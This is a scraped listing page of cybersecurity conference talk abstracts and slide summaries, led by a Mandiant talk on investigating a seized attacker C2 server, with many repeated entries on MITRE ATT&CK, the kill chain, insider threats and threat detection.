As an incident responder, have you ever thought about how much easier an investigation would be if you had the C2 server in your possession? In this talk, we are going to deep dive a rare investigation in which Mandiant obtained a forensic copy of an attacker C2 system. You will learn about the initial compromise of the C2 server, the tools and tactics used by the attacker, and the investigative steps taken to identify the full scope of the attack. In addition, you will learn about the specific challenges involved with the analysis, the tool I developed to carve all PostgreSQL rows from a forensic image, and some unique lessons learned from performing this investigation.
This session will provide insight into highly disruptive breaches that Mandiant investigated over the past year. It describes how threat actors have destroyed system infrastructure and taken companies offline for weeks. The threat actors are split into two categories for this talk, financially motivated vs. non-financially motivated, with a focus on the SHAMOON cases. I will also talk about highlights from Incident Response cases of 2017:
- How recent attacks with SHAMOON differ in their motives compared to financially motivated threat actors.
- Highlights from a couple of 2017 IRs: an overview of the TTPs of the important state-sponsored attacks seen in 2017.
The document discusses indicators of compromise from a cyber attack. It describes the various stages an attacker goes through, from initial access to installing malware and establishing command and control. The document analyzes the host to find malware samples, network connections, and extracted files. It also looks for indicators in network traffic, such as tools downloaded and data uploaded to attacker infrastructure. The document concludes with monitoring the effectiveness of security tools and ongoing attribution of attacks.
This document discusses Mandiant's incident response methodology and technology. It covers their evolution of incident response approaches over time from disk forensics to memory forensics to live response. Mandiant's current approach involves hunting across endpoints and networks using indicators of compromise to identify compromised systems. They deploy network and host sensors to gain visibility and conduct deep analysis using tools like Mandiant Incident Response and Network Traffic Analysis Platform. The document also outlines Mandiant's incident response services and how they help organizations understand risk, identify compromises, and prepare for future incidents.
David Bianco - Enterprise Security Monitoring (bsidesaugusta)
The document discusses enterprise security monitoring and intel-driven detection. It outlines the benefits of aggregating data across an organization to improve visibility and detection capabilities. It then describes how indicators can be used for attribution, detection, profiling, and prediction of threats. Various detection options are evaluated like Snort, HIPS, and MIR for their ability to detect scenarios in the kill chain using available indicators.
Standardizing and Strengthening Security to Lower Costs (OpenDNS)
Your managed service includes anti-virus, an email filter and a firewall. So why do you still find yourself wasting resources on cleaning up and re-imaging infected customer endpoints? Learn how top MSPs are lowering costs, gaining efficiencies and fueling growth by leveraging cloud-delivered predictive security.
MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with A... (MITRE - ATT&CKcon)
This talk presents a case study which demonstrates that we should consider the knowledge and wisdom contained within ATT&CK in all organizational security initiatives, to make sure that, by fixing one thing, we have not just created an opportunity.
The presentation shows how to leverage the analysis and classification of APT tactics, techniques and procedures (TTPs) to guide research into new and novel techniques, specifically focusing on exfiltration and command and control.
DNS over HTTPS (DoH) aims to increase user privacy and security by preventing eavesdropping and manipulation of DNS data by man-in-the-middle attacks. Major web browsers such as Firefox are considering its implementation by default. But what could this possibly mean for exfiltration and command and control?
This session provides an end-to-end demo that shows DoH being implemented to provide full command and control in a popular attack simulation framework and discusses associated mitigations.
BSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status Quo (Katie Nickels)
Katie and John from the MITRE ATT&CK team present "ATT&CKing the Status Quo: Improving Threat Intelligence and Cyber Defense with MITRE ATT&CK" at BSidesLV 2018.
Putting MITRE ATT&CK into Action with What You Have, Where You Are (Katie Nickels)
This document provides an overview of Katie Nickels' presentation on putting MITRE ATT&CK into action using available resources. Some key points include:
- MITRE ATT&CK is a knowledge base of adversary tactics and techniques based on real-world observations.
- It can be used for detection, assessment, threat intelligence, and adversary emulation.
- For detection, ATT&CK can help improve focus on post-exploit activity and track gaps/improvements in coverage over time. Existing data sources can be leveraged to detect techniques.
- For assessment and engineering, ATT&CK can guide decisions around tool selection and help identify visibility and risk acceptance gaps.
A military concept now applied to cybersecurity, the "cyber kill chain" was developed by Lockheed Martin in 2011. It describes the phases an adversary will follow to target an organization. There are 7 well-defined phases, and the attack is considered successful if/when all the phases have been carried out.
(DOCUMENT IN ENGLISH)
From ATT&CKcon 3.0
By Matt Snyder, VMWare
Insider threats are some of the most treacherous and every organization is susceptible: it's estimated that theft of Intellectual Property alone exceeds $600 billion a year. Armed with intimate knowledge of your organization and masked as legitimate business, often these attacks go unnoticed until it's too late and the damage is done. To make matters worse, threat actors are now trying to lure employees with the promise of large paydays to help carry out attacks.
These advanced attacks require advanced solutions, and we are going to demonstrate how we are using the MITRE ATT&CK framework to proactively combat these threats. Armed with these tactics and techniques, we show you how to build intelligent detections to help secure even the toughest of environments.
Automation: The Wonderful Wizard of CTI (or is it?) MITRE ATT&CK
The document describes MITRE's Threat Report Automated Mapper (TRAM) tool, which uses machine learning to automatically map cyber threat reports to MITRE ATT&CK techniques. TRAM aims to streamline the process of analyzing reports and adding information to ATT&CK, though challenges remain around prediction accuracy and identifying new techniques. The document outlines TRAM's development process and discusses balancing automation with human analysis to better integrate cyber threat intelligence into ATT&CK.
This document discusses how the MITRE ATT&CK framework can help sharpen a threat hunting program. It begins with distinguishing threat hunting from threat detection, noting that threat hunting is a proactive manual process of searching through systems to identify signs of adversary activity. The document then provides an overview of the MITRE ATT&CK framework and how its tactics and techniques can be used to structure threat hunting searches. It concludes by explaining how the ATT&CK framework helps focus hunting efforts on the specific techniques adversaries are likely using and improves the ability to communicate findings across security teams.
Most organizations have good enterprise-level security policies that define their approach to maintaining, improving, and securing their information and information systems. However, once the policies are signed by senior leadership and distributed throughout the organization, significant cybersecurity governance challenges remain. In this workshop I will explain how to transform organizational security to strengthen defenses and integrate cybersecurity with the overall approach toward security governance, risk management and compliance.
Detecting Threats: A Look at the Verizon DBIR and StealthWatch (Lancope, Inc.)
A common theme in data breach investigations is the deficit between the time it takes an attacker to compromise a system and the time it takes for the defender to detect the attack. In many cases, victim organizations do not know they have been breached for weeks or months after the initial compromise, while attackers can gain access in a matter of minutes or hours.
The StealthWatch® System can drastically reduce the time to identify threats, giving security personnel a window of opportunity to mitigate an attack before valuable data is lost. This webinar will cover how StealthWatch quickly detects a variety of malicious activity, using threat information from the Verizon 2015 Data Breach Investigations Report as a backdrop.
Participants will learn how StealthWatch can quickly detect:
- Crimeware
- Insider threats
- Point-of-sale (POS) intrusions
- Cyber-espionage
From ATT&CKcon 3.0
By Jared Stroud, Lacework
Adversaries target common cloud misconfigurations in container-focused workflows for initial access. Whether in Docker or Kubernetes environments, Lacework Labs has identified adversaries attempting to deploy malicious container images (T1610), mine cryptocurrency (T1496), and deploy C2 agents. Defenders new to the container space may be unaware of the built-in capabilities popular container runtime engines have that can help defend against rogue containers being deployed into their environment. Attendees will walk away with an understanding of what these attack patterns look like based on honeypot data Lacework has gathered over the past year, as well as techniques for defending their own container-focused workloads.
Inside Cybercrime Groups Harvesting Active Directory for Fun and Profit - Vit... (PROIDEA)
Vitali presents malware techniques and tricks on how to reverse engineer and analyze malware families exploiting Active Directory. The talk dives deeper into pseudo-source-code-level analysis and the malware developers' implementation of Lightweight Directory Access Protocol (LDAP) harvesting techniques for lateral movement and persistence across the corporate environment. The talk explores three prolific malware families, TrickBot, QakBot, and IcedID (BokBot), and their coding routines and patterns that are focused on collecting LDAP data. For example, TrickBot specifically grabs credential and group policy information stored in “SYSVOL”, as well as searching the domain controller for corporate machines that may be associated with point-of-sale terminals. Vitali also presents detection and mitigation methods for detecting Active Directory exploitation and discusses defense mechanisms surrounding the most popular Active Directory methods used in the wild by sophisticated groups.
This in-depth understanding of your cyber terrain informs your defense, allowing you to lay traps and pitfalls for would-be attackers. Knowing what attackers are looking for and how they are going to try to move throughout your network provides you with a key advantage. With this knowledge, Deception technology becomes a powerful weapon in your defensive arsenal.
RH-ISAC Summit 2019 - Adam Pennington - Leveraging MITRE ATT&CK™ for Detectio... (Adam Pennington)
Slides presented at the 2019 RH-ISAC Retail Cyber Intelligence Summit by Adam Pennington in Denver, CO on "Leveraging MITRE ATT&CK™ for Detection, Analysis & Defense"
Cloud-Enabled: The Future of Endpoint Security (CrowdStrike)
As the cost and complexity of deploying and maintaining on-premises security continues to rise, many endpoint security providers have embraced the cloud as the ideal way to deliver their solutions. Yet, incorporating cloud services into legacy architectures limits their ability to fully engage the tremendous power the cloud offers.
CrowdStrike Falcon recognized the value of cloud-delivery from the beginning, developing architecture built from the ground up to take full advantage of the cloud. CrowdStrike’s cloud-powered endpoint security not only ensures rapid deployment and infinite scalability, it increases your security posture by enabling real-time advanced threat protection across even the largest, distributed enterprises.
In this CrowdCast, Jackie Castelli, Sr. Product Manager, will discuss:
- The advantages of endpoint protection purpose-built for the cloud: why it allows you to take full advantage of the cloud’s power
- The common concerns organizations face when evaluating cloud-based endpoint security: can privacy and control be assured?
- Real-world examples demonstrating the unique advantages offered by CrowdStrike Falcon’s innovative cloud-powered platform
Extend Network Visibility and Secure Applications and Data in Azure (Fidelis Cybersecurity)
This document summarizes a presentation about extending network visibility in Azure using Microsoft, Gigamon, and Fidelis. It discusses Azure Virtual Network TAP, Gigamon Cloud for aggregating and distributing traffic in Azure, and how Fidelis Network can be used for threat detection, content inspection, and automated response. The integration of these solutions provides security and operations teams visibility into network traffic across Azure environments to more effectively monitor for threats and inspect content.
Combating Insider Threats – Protecting Your Agency from the Inside Out (Lancope, Inc.)
When Edward Snowden leaked classified information to the mainstream media, it brought the dangers posed by insider threats to the forefront of public consciousness, and not without reason. Today’s agencies are drowning in fears surrounding sophisticated cyber-attacks, but perhaps the most concerning type of attack out there is the insider threat. According to Forrester, abuse by malicious insiders makes up 25% of data breaches. Learn about the best practices and technologies you should be implementing now to avoid becoming the next victim of a high-profile attack.
- Become aware of the different types of insider threats, including their motives and methods of attack
- Understand why conventional security tools like firewalls, antivirus and IDS/IPS are powerless in the face of the insider threat
- Gain clarity on the various technologies, policies and best practices that should be put in place to help detect and thwart insider threats
- Discover how network logs, particularly NetFlow, can be used to cost-effectively monitor for suspicious insider behaviors that could indicate an attack
- Know about emerging attack methods such as muleware that could further escalate insider threats in the coming years
Extending Network Visibility: Down to the Endpoint (Lancope, Inc.)
In today’s world of constantly evolving security threats and attack vectors, organizations need to be vigilant about monitoring their network infrastructure. The network perimeter and security infrastructure are often challenged by the adoption of mobile devices, cloud, and BYOD policies. The need for visibility into endpoint activity has become more important than ever.
Join Josh Applebaum (Ziften), Matthew Frederickson (Council Rock School District) and Peter Johnson (Lancope) for a complimentary webinar to learn how you can achieve real-time network visibility and intelligence for improved incident response.
Discover how you can:
- Achieve additional visibility and context to network activity
- Enhance your existing security investments (NetFlow, Firewall, SIEM, threat intelligence)
- Improve incident response by obtaining real-time and historical endpoint data
CrowdCasts Monthly: Mitigating Pass the Hash (CrowdStrike)
Sixteen years later, Pass the Hash (PtH) is still one of the most common techniques a targeted attacker can use to compromise a network. There have been many blogs, webinars, and papers covering different PtH mitigation strategies. Despite all the information about this particular security vulnerability, networks are still continuously attacked and infiltrated using this technique. It is time to look at the problem from a holistic approach and apply the community's collective intelligence to make this technique one of the most difficult for a targeted attacker to use.
The cyber kill chain describes cyber attacks from an attacker's perspective through distinct phases: (1) reconnaissance, (2) weaponization, (3) delivery, (4) exploitation, (5) installation, (6) command and control, and (7) actions on objectives. Each phase of the kill chain can be mapped to defensive tools and actions to prevent attacks. Understanding the kill chain stages gives analysts insight into what is being attempted and how to respond appropriately. The kill chain was developed by Lockheed Martin as a method to describe intrusions and prevent advanced persistent threats by highly trained adversaries targeting sensitive information.
This document discusses the stages of targeted attacks and the techniques used at each stage. It begins by outlining the 6 main stages of targeted attacks: 1) intelligence gathering, 2) point of entry, 3) command and control communication, 4) lateral movement, 5) data discovery, and 6) data exfiltration. For each stage, it describes common tactics attackers use, such as spearphishing for the point of entry or using encrypted communications over the Tor network for exfiltration. The document emphasizes that comprehensive security measures are needed to detect threats across all stages of attack.
This document discusses two case studies involving industrial control systems security:
1) A case study of an ICS operator that used Mandiant Security Consulting Services to build a comprehensive cyber security program across both IT and operational technology.
2) A case study of how another ICS operator used passive network monitoring with FireEye PX to identify flaws in their SCADA network configuration and validate network segmentation between the business network and SCADA network.
This document discusses analyzing RDP traffic using the Bro network analysis framework. It provides background on using Bro at CrowdStrike for incident response and threat detection. It describes how the author developed a Bro script to detect RDP connections, log relevant details like usernames to a file, and identify anomalous RDP activity. Examples are given of the script identifying Nessus scans, password cracking tools, and anomalous RDP connections on non-standard ports. Future work areas discussed include passing more data to SSL and certificate analyzers and testing on higher bandwidth networks.
BSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status QuoKatie Nickels
Katie and John from the MITRE ATT&CK team present "ATT&CKing the Status Quo: Improving Threat Intelligence and Cyber Defense with MITRE ATT&CK" at BSidesLV 2018.
Putting MITRE ATT&CK into Action with What You Have, Where You AreKatie Nickels
This document provides an overview of Katie Nickels' presentation on putting MITRE ATT&CK into action using available resources. Some key points include:
- MITRE ATT&CK is a knowledge base of adversary tactics and techniques based on real-world observations.
- It can be used for detection, assessment, threat intelligence, and adversary emulation.
- For detection, ATT&CK can help improve focus on post-exploit activity and track gaps/improvements in coverage over time. Existing data sources can be leveraged to detect techniques.
- For assessment and engineering, ATT&CK can guide decisions around tool selection and help identify visibility and risk acceptance gaps.
Conceito militar, agora aplicado a Cibersegurança, o "the cyber kill chain" foi desenvolvido pela Lockheed Martin em 2011. Ele descreve as fases que um adversário seguirá para alvejar uma Organização. São 7 fases bem definidas e este ataque é considerado bem sucedido
se / quando todas as fases foram realizadas.
(DOCUMENTO EM INGLÊS)
From ATT&CKcon 3.0
By Matt Snyder, VMWare
Insider threats are some of the most treacherous and every organization is susceptible: it's estimated that theft of Intellectual Property alone exceeds $600 billion a year. Armed with intimate knowledge of your organization and masked as legitimate business, often these attacks go unnoticed until it's too late and the damage is done. To make matters worse, threat actors are now trying to lure employees with the promise of large paydays to help carry out attacks.
These advanced attacks require advanced solutions, and we are going to demonstrate how we are using the MITRE ATT&CK framework to proactively combat these threats. Armed with these tactics and techniques, we show you how to build intelligent detections to help secure even the toughest of environments.
Automation: The Wonderful Wizard of CTI (or is it?) MITRE ATT&CK
The document describes MITRE's Threat Report Automated Mapper (TRAM) tool, which uses machine learning to automatically map cyber threat reports to MITRE ATT&CK techniques. TRAM aims to streamline the process of analyzing reports and adding information to ATT&CK, though challenges remain around prediction accuracy and identifying new techniques. The document outlines TRAM's development process and discusses balancing automation with human analysis to better integrate cyber threat intelligence into ATT&CK.
This document discusses how the MITRE ATT&CK framework can help sharpen a threat hunting program. It begins with distinguishing threat hunting from threat detection, noting that threat hunting is a proactive manual process of searching through systems to identify signs of adversary activity. The document then provides an overview of the MITRE ATT&CK framework and how its tactics and techniques can be used to structure threat hunting searches. It concludes by explaining how the ATT&CK framework helps focus hunting efforts on the specific techniques adversaries are likely using and improves the ability to communicate findings across security teams.
Most organizations have good enterprise-level security policies that define their approach to maintaining, improving, and securing their information and information systems. However, once the policies are signed by senior leadership and distributed throughout the organization, significant cybersecurity governance challenges remain. In this workshop I will explain the transforming organizational security to strengthen defenses and integrate cybersecurity with the overall approach toward security governance, risk management and compliance.
Detecting Threats: A Look at the Verizon DBIR and StealthWatchLancope, Inc.
A common theme in data breach investigations is the deficit between the time it takes an attacker to compromise a system and the time it takes for the defender to detect the attack. In many cases, victim organizations do not know they have been breached for weeks or months after the initial compromise, while attackers can gain access in a matter of minutes or hours.
The StealthWatch® System can drastically reduce the time to identify threats, giving security personnel a window of opportunity to mitigate an attack before valuable data is lost. This webinar will cover how StealthWatch quickly detects a variety of malicious activity, using threat information from the Verizon 2015 Data Breach Investigations Report as a backdrop.
Participants will learn how StealthWatch can quickly detect:
- Crimeware
- Insider threats
- Point-of-sale (POS) intrusions
- Cyber-espionage
From ATT&CKcon 3.0
By Jared Stroud, Lacework
Adversaries target common cloud misconfigurations in container-focused workflows for initial access. Whether this is Docker or Kubernetes environments, Lacework Labs has identified adversaries attempting to deploy malicious container images (T1610) , mine Cryptocurrency (T1496), and deploy C2 agents. Defenders new to the container space may be unaware of the built-in capabilities popular container runtime engines have that can help defend against rogue containers being deployed into their environment. Attendees will walk away with an understanding of what these attack patterns look like based on honeypot data Lacework has gathered over the past year, as well as techniques on how to defend their own container focused workloads.
Inside Cybercrime Groups Harvesting Active Directory for Fun and Profit - Vit...PROIDEA
Vitali presents malware techniques and tricks on how to reverse engineer and analyze malware families exploiting active directory. The talk dives deeper into pseudo-source code level analysis and malware developer implementation of Lightweight Directory Access Protocol (LDAP) harvesting techniques for lateral movement and persistence across corporate environment. The talks explores three prolific malware families such as TrickBot, QakBot, and IcedID (BokBot) and their coding routine and patterns that are focused on collecting LDAP. For example, TrickBot specifically grabs credential and group policy information stored in “SYSVOL” das well as searching for corporate machines for possible sensitive machines associated with possible point-of-sale terminals on domain controller. Vitali also presents detection and mitigation methods on how to detect active directory exploitation and discusses defense mechanisms surrounding most popular active methods used in the wild by the sophisticated groups.
This in-depth understanding of your cyber terrain informs your defense, allowing you to lay traps and pitfalls for would-be attackers. Knowing what attackers are looking for and how they are going to try to move throughout your network provides you with a key advantage. With this knowledge, Deception technology becomes a powerful weapon in your defensive arsenal.
RH-ISAC Summit 2019 - Adam Pennington - Leveraging MITRE ATT&CK™ for Detectio...Adam Pennington
Slides presented at the 2019 RH-ISAC Retail Cyber Intelligence Summit by Adam Pennington in Denver, CO on "Leveraging MITRE ATT&CK™ for Detection, Analysis & Defense"
Cloud-Enabled: The Future of Endpoint SecurityCrowdStrike
As the cost and complexity of deploying and maintaining on-premises security continues to rise, many endpoint security providers have embraced the cloud as the ideal way to deliver their solutions. Yet, incorporating cloud services into legacy architectures limits their ability to fully engage the tremendous power the cloud offers.
CrowdStrike Falcon recognized the value of cloud-delivery from the beginning, developing architecture built from the ground up to take full advantage of the cloud. CrowdStrike’s cloud-powered endpoint security not only ensures rapid deployment and infinite scalability, it increases your security posture by enabling real-time advanced threat protection across even the largest, distributed enterprises.
In this CrowdCast, Jackie Castelli, Sr. Product Manager will discuss:
•The advantages of endpoint protection purpose-built for the cloud – why it allows you to take full advantage of the cloud’s power
•The common concerns organizations face when evaluating cloud-based endpoint security - can privacy and control be assured?
•Real-world examples demonstrating the unique advantages offered by CrowdStrike Falcon’s innovative cloud-powered platform
Extend Network Visibility and Secure Applications and Data in AzureFidelis Cybersecurity
This document summarizes a presentation about extending network visibility in Azure using Microsoft, Gigamon, and Fidelis. It discusses Azure Virtual Network TAP, Gigamon Cloud for aggregating and distributing traffic in Azure, and how Fidelis Network can be used for threat detection, content inspection, and automated response. The integration of these solutions provides security and operations teams visibility into network traffic across Azure environments to more effectively monitor for threats and inspect content.
Combating Insider Threats – Protecting Your Agency from the Inside Out (Lancope, Inc.)
When Edward Snowden leaked classified information to the mainstream media, it brought the dangers posed by insider threats to the forefront of public consciousness, and not without reason. Today’s agencies are drowning in fears surrounding sophisticated cyber-attacks, but perhaps the most concerning type of attack out there is the insider threat. According to Forrester, abuse by malicious insiders makes up 25% of data breaches. Learn about the best practices and technologies you should be implementing now to avoid becoming the next victim of a high-profile attack.
- Become aware of the different types of insider threats, including their motives and methods of attack
- Understand why conventional security tools like firewalls, antivirus and IDS/IPS are powerless in the face of the insider threat
- Gain clarity on the various technologies, policies and best practices that should be put in place to help detect and thwart insider threats
- Discover how network logs, particularly NetFlow, can be used to cost-effectively monitor for suspicious insider behaviors that could indicate an attack
- Know about emerging attack methods such as muleware that could further escalate insider threats in the coming years
Extending Network Visibility: Down to the Endpoint (Lancope, Inc.)
In today’s world of constantly evolving security threats and attack vectors, organizations need to be vigilant about monitoring their network infrastructure. The network perimeter and security infrastructure are often challenged by the adoption of mobile devices, cloud, and BYOD policies. The need for visibility into endpoint activity has become more important than ever.
Join Josh Applebaum (Ziften), Matthew Frederickson (Council Rock School District) and Peter Johnson (Lancope) for a complimentary webinar to learn how you can achieve real-time network visibility and intelligence for improved incident response.
Discover how you can:
- Achieve additional visibility and context to network activity
- Enhance your existing security investments (NetFlow, Firewall, SIEM, threat intelligence)
- Improve incident response by obtaining real-time and historical endpoint data
CrowdCasts Monthly: Mitigating Pass the Hash (CrowdStrike)
Sixteen years later and Pass the Hash (PtH) is still one of the most common techniques a targeted attacker can use to compromise a network. There have been many blogs, webinars, and papers covering different PtH mitigation strategies. With all the information about this particular security vulnerability, networks are still continuously attacked and infiltrated using this technique. It is time to look at the problem from a holistic approach and apply the community’s collective intelligence to make this process one of the most difficult for a targeted attacker to use.
The cyber kill chain describes cyber attacks from an attacker's perspective through distinct phases: (1) reconnaissance, (2) weaponization, (3) delivery, (4) exploitation, (5) installation, (6) command and control, and (7) actions on objectives. Each phase of the kill chain can be mapped to defensive tools and actions to prevent attacks. Understanding the kill chain stages gives analysts insight into what is being attempted and how to respond appropriately. The kill chain was developed by Lockheed Martin as a method to describe intrusions and prevent advanced persistent threats by highly trained adversaries targeting sensitive information.
This document discusses the stages of targeted attacks and the techniques used at each stage. It begins by outlining the 6 main stages of targeted attacks: 1) intelligence gathering, 2) point of entry, 3) command and control communication, 4) lateral movement, 5) data discovery, and 6) data exfiltration. For each stage, it describes common tactics attackers use, such as spearphishing for the point of entry or using encrypted communications over the Tor network for exfiltration. The document emphasizes that comprehensive security measures are needed to detect threats across all stages of attack.
This document discusses two case studies involving industrial control systems security:
1) A case study of an ICS operator that used Mandiant Security Consulting Services to build a comprehensive cyber security program across both IT and operational technology.
2) A case study of how another ICS operator used passive network monitoring with FireEye PX to identify flaws in their SCADA network configuration and validate network segmentation between the business network and SCADA network.
This document discusses analyzing RDP traffic using the Bro network analysis framework. It provides background on using Bro at CrowdStrike for incident response and threat detection. It describes how the author developed a Bro script to detect RDP connections, log relevant details like usernames to a file, and identify anomalous RDP activity. Examples are given of the script identifying Nessus scans, password cracking tools, and anomalous RDP connections on non-standard ports. Future work areas discussed include passing more data to SSL and certificate analyzers and testing on higher bandwidth networks.
WebRTC Infrastructure, the Hard Parts: Media (Dialogic Inc.)
Discussion on handling WebRTC media:
- What are the main reasons to terminate WebRTC media
- Media server use cases in WebRTC
- Client-side media processing vs. server-side trade-offs
- Potential media services for today & tomorrow
- Introduction to the Media Resource Broker (MRB) for scaling and orchestrating media servers/MRF
- How media handling architectures are evolving & scaling for cloud/NFV networks
[CB20] Operation Chimera - APT Operation Targets Semiconductor Vendors by CK ... (CODE BLUE)
This presentation provides an analysis of the advanced persistent threat (APT) attacks that have occurred during the past two years on the semiconductor industry. Our research shows that the majority of these attacks were concentrated on the Taiwan semiconductor sector. This is worthy of concern, as Taiwan's semiconductor industry plays a very crucial role in the world. Even a small disruption in the supply chain could have a serious ripple effect throughout the entire industry. Surprisingly, up until now, there has been less coverage on these attacks. In this presentation, we seek to shed light on the threat actors and campaigns of these attacks, where they are collectively referred to as Operation Chimera (a.k.a. Skeleton). Additionally, we provide a brief overview of the current information security status of Taiwan's semiconductor industry.
Between 2018 and 2019, we discovered several attacks on various semiconductor vendors located at the Hsinchu Science-based Industrial Park in Taiwan. As these attacks employed similar attack techniques and tactics, a pattern could be discerned from the malicious activities. From this pattern, we deduced that these attacks, which we dubbed Operation Chimera, were actually conducted by the same threat actor. The main objective of these attacks appeared to be stealing intelligence, specifically documents about IC chips, software development kits (SDKs), IC designs, the source code, etc. If such documents are successfully stolen, the impact can be devastating. The motive behind these attacks likely stems from competitors or even countries seeking to gain a competitive advantage over rivals.
In this webinar, we review the benefits of deploying a microservices architecture with Cassandra as your backbone in order to ensure your applications become incredibly reliable. We discuss in detail:
- How to create microservices in Node.js with ExpressJs and Seneca
- Tuning the Node.js driver for Cassandra: error handling, load balancing and degrees of parallelism
- Additional best practices to ensure your systems are highly performant and available
The sample service is available on GitHub: https://github.com/jorgebay/killr-service
The document discusses considerations for server-side WebRTC infrastructure. It describes how WebRTC uses STUN and TURN servers to handle NAT traversal so clients can establish direct peer-to-peer connections. However, media servers and WebRTC gateways are also important to provide value-added functions like conferencing, recording, transcoding and interoperating WebRTC with existing VoIP networks. The document compares different approaches for multi-party video, including mesh, MCU, SFU and simulcast, and how servers can optimize resource usage for large scale conferencing.
The need for a hardened development environment is key, since the implications are far-reaching, from IP compromise to ransomware that can effectively lock you out of your own code repository. The impact can potentially put several man-years’ worth of effort at risk.
Original copy at https://www.synerzip.com/webinar/botnet-detection-countermeasures-2/
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu... (CODE BLUE)
We are swamped with new types of malware every day. The goal of malware analysis is not to reveal every single detail of the malware. It is more important to develop tools for efficiency or introduce automation to avoid repeating the same analysis process. Therefore, malware analysts usually actively develop tools and build analysis systems. On the other hand, such tool development and system maintenance cost a lot. Incident trends change daily, and malware keeps evolving. However, it is not easy to keep up with new threats. Malware analysts spend a long time maintaining their analysis systems, which reduces the time available for necessary analysis of new types of malware.
To solve these problems, we incorporate DevOps practices into malware analysis to reduce the cost of system maintenance by using CI/CD and Serverless. This presentation shares our experience on how CI/CD, Serverless, and other cloud technologies can be used to streamline malware analysis. Specifically, the following case studies are discussed.
* Malware C2 Monitoring
* Malware Hunting using Cloud
* YARA CI/CD system
* Malware Analysis System on Cloud
* Memory Forensic on Cloud
Through the above case studies, we will share the benefits and tips of using the cloud and show how to build a similar system using Infrastructure as Code (IaC). The audience will learn how to improve the efficiency of malware analysis and build a malware analysis system using Cloud infrastructure.
WebRTC Infrastructure: The Hard Parts v4 (Dialogic Inc.)
This document discusses the infrastructure challenges of WebRTC including network address translation traversal using TURN servers, media gateways for interworking between protocols, and media servers. Media servers are needed for conferencing, transcoding, server-side media processing for applications, security, and reliability. New approaches like selective forwarding units and simulcast aim to improve scalability of media distribution compared to traditional mesh-based conferencing. The document concludes that while terminating media on servers has costs, it is often necessary and architectures are evolving to make media processing more efficient.
Using hypervisor and container technology to increase datacenter security pos... (Black Duck by Synopsys)
As presented by Tim Mackey, Senior Technical Evangelist - Black Duck Software, at LinuxCon/ContainerCon 2016:
Cyber threats consistently rank as a high priority for data center operators and their reliability teams. As increasingly sophisticated attacks mount, the risk associated with a zero-day attack is significant. Traditional responses include perimeter monitoring and anti-malware agents. Unfortunately, those techniques introduce performance and management challenges when used at large VM densities, and may not work well with containerized applications.
Fortunately, the Xen Project community has collaborated to create a solution which reduces the potential of success associated with rootkit attack vectors. When combined with recent advancements in processor capabilities, and secure development models for container deployment, it’s possible to both protect against and be proactively alerted to potential zero-day attacks. In this session, we’ll cover models to limit the scope of compromise should an attack be mounted against your infrastructure. Two attack vectors will be illustrated, and we’ll see how it’s possible to be proactively alerted to potential zero-day actions without requiring significant reconfiguration of your datacenter environment.
Technology elements explored include those from Black Duck, Bitdefender, Citrix, Intel and Guardicore.
Using hypervisor and container technology to increase datacenter security pos... (Tim Mackey)
As presented at LinuxCon/ContainerCon 2016:
2016, A New Era of OS and Cloud Security (Tudor Damian)
The global security landscape is changing, now more than ever. With cloud computing gaining momentum and advanced persistent threats becoming a common occurrence, the industry is taking a more focused and serious approach when it comes to security, especially after some of last year’s heavily publicized incidents. Join this session for a discussion on what Microsoft is doing to protect against these new security threats with fresh approaches taken both at the server & client OS level, as well as in Azure.
2016, A New Era of OS and Cloud Security - Tudor Damian (ITCamp)
This document summarizes a presentation about new security trends and technologies from Microsoft. The presentation covered:
1) Industry security trends like the evolution of attacks from script kiddies to organized crime and nation-states, and how modern attacks compromise credentials and use legitimate tools.
2) New Microsoft security technologies like Shielded VMs, Hypervisor Code Integrity, and Device Guard that provide hardware-based security on Windows devices.
3) Other technologies like Provable PC Health, which attests the health of devices, and Advanced Threat Analytics, which uses machine learning to detect abnormal Active Directory usage indicating attacks.
Making Threat Management More Manageable (IBM Security)
With significant breaches of personal and corporate data being announced on a near-regular cadence, there is even more value in understanding both how the dynamic attack chain really works, and what tools your organization can use to disrupt it. From break-in to exfiltration, follow along step-by-step to understand how easy it is for attackers to infiltrate your network and steal sensitive data. Learn what technologies you can use to combat these threats and contain the impact of a breach, and determine what protection strategy you should encompass to make threat management more manageable.
View the full on-demand webcast: http://securityintelligence.com/events/making-threat-management-manageable/#.VMvYyPMo6Mp
CrowdCasts Monthly: Going Beyond the Indicator (CrowdStrike)
Learn more about CrowdStrike Services. Request a free consultation on Proactive Response and Incident Response offerings: response.crowdstrike.com/services/
Amazon GuardDuty - Let's Attack My Account! - AWS Online Tech Talks (Amazon Web Services)
Learning Objectives:
- How to safely generate a number of Amazon GuardDuty findings
- How to analyze Amazon GuardDuty findings
- How to think about remediation of threats
- The document discusses nameserver redirection attacks and SQL injection attacks against domain name registry systems.
- It provides examples of how attackers can change domain name registrations through SQL injection or by directly modifying registry databases to redirect traffic to malicious sites.
- A live demonstration shows how SQL injection can be used to enumerate and modify a registry database, redirecting a domain to a rogue IP address and server.
- Mitigation strategies include securing web applications, validating input, using authentication for changes, and information sharing about attacks.
Protecting the Software-Defined Data Center from Data Breach (CA Technologies)
In this session, learn:
- Security requirements for our next generation software-defined data centers
- VMware NSX™, VMware’s network virtualization platform, and how it protects the software-defined data center
- CA Privileged Access Manager for VMware NSX™, and how it protects the management plane of VMware NSX™
For more information, please visit http://cainc.to/Nv2VOe
Similar to Honey, I Stole Your C2 Server: A Dive into Attacker Infrastructure (20)
This document provides an overview of WebAssembly (WASM) and analyzes its attack surface. It begins with a brief history of WASM and describes its Minimum Viable Product (MVP) 1.0 specification, which defines its instruction set and file format. It then discusses WASM's implementation in web browsers and interaction with JavaScript, highlighting its potential attack surface. Examples of past vulnerabilities leveraging WASM are also provided, such as CVE-2017-5116 which used a race condition to redirect execution to attacker-controlled code. The document concludes by discussing the future of WASM and taking questions.
This document discusses techniques used for hunting and analyzing malware on Mac systems. It describes common commands used by attackers for reconnaissance, backdoor installation, persistence, cleanup, and lateral movement. Specific indicators are also provided, such as backdoor file names and IP addresses. Hunting involves understanding the process tree and difficulties in detection given legitimate system tools are also used by attackers.
